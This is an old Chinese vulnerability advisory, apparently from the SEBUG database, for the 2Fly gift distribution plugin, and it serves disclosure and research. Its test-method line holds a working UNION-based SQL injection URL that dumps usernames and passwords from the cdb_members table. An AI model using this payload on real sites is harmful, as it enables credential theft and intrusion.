注册
登录
| 关键词: 礼品 方法 安全 之用 不严 帐号 攻击性 序列号 多方面 membersSEBUG |
发布时间:2009-08-15 影响版本: V1.1.1漏洞描述: 2Fly礼品(序号)发放系统 本插件可用于发布任何实物礼品、文字项目、序列号、帐号、推广等多方面应用。 存在过滤不严的问题。<*参考 http://www.hacksb.cn/post/59.html *> 测试方法: [www.sebug.net] 本站提供程序(方法)可能带有攻击性,仅供安全研究与教学之用,风险自负!http://www.xxx.com/2fly_gift.php?pages=content&gameid=16 and 1=2 union select 1,2,3,4,concat(username,0x3a,password),6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37 from cdb_membersSEBUG安全建议: 暂无 |
|
声明:文章版权归原作者所有 部分文章转自互联网 如有侵权请联系
[邮箱地址] 删除
|
